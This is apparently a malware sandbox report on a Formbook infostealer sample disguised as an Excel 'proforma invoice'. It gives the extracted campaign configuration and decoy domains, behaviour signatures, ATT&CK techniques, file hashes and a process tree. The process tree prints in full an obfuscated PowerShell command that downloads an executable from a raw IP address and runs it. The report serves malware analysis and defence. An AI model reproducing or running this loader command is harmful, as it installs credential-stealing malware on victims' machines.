formbook | fb5a6a5965acca3363cbd1157c564584f2b85f41c6ec10a659e05cb559800202

Analysis

max time kernel
147s
max time network
134s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
23-09-2024 14:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PROFORMA INVOICE.xls
Size

706KB
MD5

a387e1b3ddfebd3a54d76332e03c7429
SHA1

84e7c4c1c9ea719e03a9ad35b17552ef52f0939e
SHA256

fb5a6a5965acca3363cbd1157c564584f2b85f41c6ec10a659e05cb559800202
SHA512

ef088fb7ed0d6e47cd88d267b4c2bed52be5c046984c1e47a3abb598266ee1b5787133dae27bd66ef401fcdda7515de682be99e948d3bd236481a74e697c0a37
SSDEEP

12288:m+UOAsHFnd7HeT/o8gg8Rsfe8Lyi6PlCJ6lKR+PFPSm/YBxyxdDEyawqkLP:mepsAbg8RGetCJR+P1SbiEzK

Score

10^/10

formbook j62t defense_evasion discovery execution rat spyware stealer trojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

j62t

Decoy

qualegacy.shop

ijngblv.top

hop-tiktok.top

nti-aging-66026.bond

ostashqiptare-al.info

faretireltd.info

dra.finance

arden-office-45382.bond

nair.today

dence.tokyo

omoantifragilis.net

eet-new-people-26331.bond

ocfamilyto.llc

roduct-tester-jobs-68513.bond

elestialaurelia.buzz

uzzbuilders.buzz

ryptofaucet.xyz

krfq.shop

jbhu.vip

uemw.top

Signatures

Formbook
Formbook is a data stealing malware which is capable of stealing data.
trojan spyware stealer formbook

Formbook payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/2348-74-0x0000000000400000-0x000000000042F000-memory.dmp	formbook
behavioral1/memory/2324-78-0x0000000000080000-0x00000000000AF000-memory.dmp	formbook

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	2808	mshta.exe
11	2808	mshta.exe
13	2724	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
2724	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1708	audiodg.exe
2348	audiodg.exe

Loads dropped DLL 3 IoCs

pid	Process
2724	powershell.exe
2724	powershell.exe
1708	audiodg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1708 set thread context of 2348	1708	audiodg.exe	40
PID 2348 set thread context of 1200	2348	audiodg.exe	21
PID 2324 set thread context of 1200	2324	wininit.exe	21

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	audiodg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wininit.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2548	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2724	powershell.exe
2724	powershell.exe
2724	powershell.exe
2348	audiodg.exe
2348	audiodg.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe
2324	wininit.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2348	audiodg.exe
2348	audiodg.exe
2348	audiodg.exe
2324	wininit.exe
2324	wininit.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	2348	audiodg.exe
Token: SeDebugPrivilege	2324	wininit.exe
Token: SeShutdownPrivilege	1200	Explorer.EXE
Token: SeShutdownPrivilege	1200	Explorer.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2548	EXCEL.EXE
2548	EXCEL.EXE
2548	EXCEL.EXE
2548	EXCEL.EXE
2548	EXCEL.EXE

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 2620	2808	mshta.exe	32
PID 2808 wrote to memory of 2620	2808	mshta.exe	32
PID 2808 wrote to memory of 2620	2808	mshta.exe	32
PID 2808 wrote to memory of 2620	2808	mshta.exe	32
PID 2620 wrote to memory of 2724	2620	cmd.exe	34
PID 2620 wrote to memory of 2724	2620	cmd.exe	34
PID 2620 wrote to memory of 2724	2620	cmd.exe	34
PID 2620 wrote to memory of 2724	2620	cmd.exe	34
PID 2724 wrote to memory of 332	2724	powershell.exe	35
PID 2724 wrote to memory of 332	2724	powershell.exe	35
PID 2724 wrote to memory of 332	2724	powershell.exe	35
PID 2724 wrote to memory of 332	2724	powershell.exe	35
PID 332 wrote to memory of 1556	332	csc.exe	36
PID 332 wrote to memory of 1556	332	csc.exe	36
PID 332 wrote to memory of 1556	332	csc.exe	36
PID 332 wrote to memory of 1556	332	csc.exe	36
PID 2724 wrote to memory of 1708	2724	powershell.exe	39
PID 2724 wrote to memory of 1708	2724	powershell.exe	39
PID 2724 wrote to memory of 1708	2724	powershell.exe	39
PID 2724 wrote to memory of 1708	2724	powershell.exe	39
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1708 wrote to memory of 2348	1708	audiodg.exe	40
PID 1200 wrote to memory of 2324	1200	Explorer.EXE	41
PID 1200 wrote to memory of 2324	1200	Explorer.EXE	41
PID 1200 wrote to memory of 2324	1200	Explorer.EXE	41
PID 1200 wrote to memory of 2324	1200	Explorer.EXE	41
PID 2324 wrote to memory of 1036	2324	wininit.exe	42
PID 2324 wrote to memory of 1036	2324	wininit.exe	42
PID 2324 wrote to memory of 1036	2324	wininit.exe	42
PID 2324 wrote to memory of 1036	2324	wininit.exe	42

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1200
- C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
  "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\PROFORMA INVOICE.xls"
  2⤵
  - System Location Discovery: System Language Discovery
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  PID:2548
- C:\Windows\SysWOW64\wininit.exe
  "C:\Windows\SysWOW64\wininit.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    /c del "C:\Users\Admin\AppData\Roaming\audiodg.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1036

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'JGNTRXluWUggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZbGJFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVNU21adlNwVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFlmRWxjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVaSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInN4dGZOYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0lHWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY1NFeW5ZSDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwMy4xMzEuMTMwLjE1NC8xNDQvYXVkaW9kZy5leGUiLCIkZU52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7U3RBclQtc0xFZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[cHaR]34+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2620
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powERShell -eX BYPAsS -nOp -w 1 -c DEVICeCrEDEntiaLdEPlOYment.eXe ; Iex($(IEx('[SySTEM.TEXT.ENCoDinG]'+[chAR]0X3A+[CHaR]58+'uTf8.gEtstRing([SySTEM.CONveRT]'+[cHar]58+[cHAr]0x3A+'FROMBaSE64STRing('+[chAR]0x22+'JGNTRXluWUggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSRGVmaW5pVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZbGJFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVNU21adlNwVix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFlmRWxjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVaSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInN4dGZOYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0lHWSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY1NFeW5ZSDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwMy4xMzEuMTMwLjE1NC8xNDQvYXVkaW9kZy5leGUiLCIkZU52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7U3RBclQtc0xFZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[cHaR]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2724
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\6ytlahlx.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:332
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2C4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC2C3.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1556
  - - C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1708
    - - C:\Users\Admin\AppData\Roaming\audiodg.exe
        
        "C:\Users\Admin\AppData\Roaming\audiodg.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
23a843240b6e69e71aa2e5fcd0d65c53

SHA1
81ad435bebb0e97149fb641f2c7cfd134396d31b

SHA256
ec7c600e59856e103374dd99faad97a7aef1556041c4e25d0ff53de281c6eaab

SHA512
f96c678d971ab148eacf42b75cfb7b6be45ac7c0c27cf8822655c489c2b8ff4cc3acffb75cc037b0497db2896331ccdc59d7b371d91e3d87262e3b1350ba8fb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
a59b38ac724018fa1cb08649273871d7

SHA1
9143982d14a89f5545c51c52f01f1c84066c5037

SHA256
63e18778f42235683488597eca6b4eeebbebd7f952789dff55bb76f150bdca3e

SHA512
be1839d69677bbd876948bdf512a5293501186790364d28f2feaaf491894fd2e4d6fe5879346085e8d7de8afb4f334c2c35de7d51962528bdb9de916a06a8d7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\IEnetworkcookie[1].hta

Filesize
8KB

MD5
f8e3cf052e176dc8c035065141da421e

SHA1
c4d8976c98b9ae59ff7bbd4b42669b57cf3899cf

SHA256
dca6fa1b5e9326a54add4fb3ae758efc4c5a4d0f94e5fdd4169cb449d083aa77

SHA512
84273bc1ef129317112147e47d16ea5ee39090c6b34db1fbfba4b3fa5388d3b3c26f545d2ba1ef78f9b27a50b9e0fab7d391248b8fc3d175c3833677ff91ac4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ytlahlx.dll

Filesize
3KB

MD5
83ff27643d4d9f54672a4ea6c94d9b1b

SHA1
6779b5582193791d6bb6c9c8ce06e6a20a54f5d6

SHA256
b9f242bceff96a53ed58402aa850f7f281dcc98ec22a6f878048a63206c60d8f

SHA512
b30f5d50e647638eddfb277a08cd4f9c30379158032a6f8c8940477672f5704aed702b2fcec797a727d8fe49448f215e451ae235ce4bc2acadcaddabfb68a159

Download Submit
C:\Users\Admin\AppData\Local\Temp\6ytlahlx.pdb

Filesize
7KB

MD5
5bb9c5f1087d96c85e0082c29b3bac8a

SHA1
f4be13a41bdfbaccce13116660bafadfc13fa5d4

SHA256
5bdac91a3cdf29342531d02eafa6b2fe4ca5124862f07fa5ec2797b0d7281521

SHA512
52c765e786d35a9db5d86fe916b8f9e63921ddac74a08cad0f8c6bcc7e4eabb0fea80562199bdf18bd404043570a8db7fb3d97cf8feb9db7d24699eff2818231

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabB876.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC2C4.tmp

Filesize
1KB

MD5
a50748bf1fcf6593ee4c69c4eca5c3c5

SHA1
bb2503fa09dc9b856fe63c12048c5d19854b78ab

SHA256
0a1c72d4153847f4432eeded4fcf44bb2ff0edc2d32e5164d8ed0ee608f01bd4

SHA512
491f14ffed37f836132c3094b3ddd5df41fa02f42667630c8eb5e5db526c27aa17525234fed7b7f40bdf31e771d0577139cf63e5cd277dce99cd7811393dc988

Download Submit
C:\Users\Admin\AppData\Roaming\audiodg.exe

Filesize
770KB

MD5
13026754941320e654b4d10b8c7c37d4

SHA1
0c355a2c24b09bd90e84bc58c842176d0b18569f

SHA256
58cdcd2f49080d4471ffd169eb6cfe86f9efae01e45423492d0e31a4db510d60

SHA512
77cc08168c0a860f56157a0926c7cee8bd18531a85869e38b1fb585e20b03e11c669a7d1a4cf002e7f06a46e8b47411c0393913e161cc05a4717db011b799279

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6ytlahlx.0.cs

Filesize
467B

MD5
deec2cbeef08f5d6a07a39fd4189249f

SHA1
174ed8f143660c9aba228b6a5dbe05bd39e0372c

SHA256
b670540a59065657d3544089a447a84d4b8a1bc8004be85311d3fff5ae0ea6ad

SHA512
54ffbed2df5ee7fd1a014f58147375bfab9794b1339b18a78d004138926835aea1e99ff3ae35acdcb39a0dda05fdddabec891ad8b1e22f79f3ffa4cf595d452d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\6ytlahlx.cmdline

Filesize
309B

MD5
82b6a5836bf6ec22e8f2758fd80b1baa

SHA1
3f1c46dcd55762fb6563894c3c619edd61ea92ca

SHA256
86d43e342a2f2589d2a12cd4de5a9f638614c2e6c20f5269c1b11fc3b09b5d36

SHA512
de73878eaef7d165b3d9f4322fd0250d57dd01a105e8810b88c38b6eb17d13a4cecba6ad4eeb40bde56871d049e4c7de665394da30ba1937c09526af6763f19c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCC2C3.tmp

Filesize
652B

MD5
1f535e3704c9d53d294f91eb25654c96

SHA1
608e7794105b924e85b7793489ceb8ee91937de2

SHA256
6def77cbc545152374c884379128ec17415d9ff84e67a208009b355dbad1b26f

SHA512
b037eb2aabf8f740f36061cabe57119800fcafebdef5997484b5cf765d981146e3359ebd7cfccfabb3893808f459800ffc6480a0f1b079fc5478e5dc96d81051

Download Submit
memory/1200-83-0x0000000007550000-0x00000000076D1000-memory.dmp

Filesize
1.5MB

Download
memory/1708-65-0x00000000011D0000-0x0000000001296000-memory.dmp

Filesize
792KB

Download
memory/1708-66-0x00000000005E0000-0x00000000005F2000-memory.dmp

Filesize
72KB

Download
memory/1708-67-0x00000000049F0000-0x0000000004A66000-memory.dmp

Filesize
472KB

Download
memory/2324-78-0x0000000000080000-0x00000000000AF000-memory.dmp

Filesize
188KB

Download
memory/2324-77-0x0000000000B10000-0x0000000000B2A000-memory.dmp

Filesize
104KB

Download
memory/2348-71-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2348-69-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2348-74-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/2348-73-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2548-17-0x00000000023D0000-0x00000000023D2000-memory.dmp

Filesize
8KB

Download
memory/2548-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2548-1-0x0000000072B1D000-0x0000000072B28000-memory.dmp

Filesize
44KB

Download
memory/2548-55-0x0000000072B1D000-0x0000000072B28000-memory.dmp

Filesize
44KB

Download
memory/2548-88-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2548-91-0x0000000072B1D000-0x0000000072B28000-memory.dmp

Filesize
44KB

Download
memory/2808-16-0x00000000021C0000-0x00000000021C2000-memory.dmp

Filesize
8KB

Download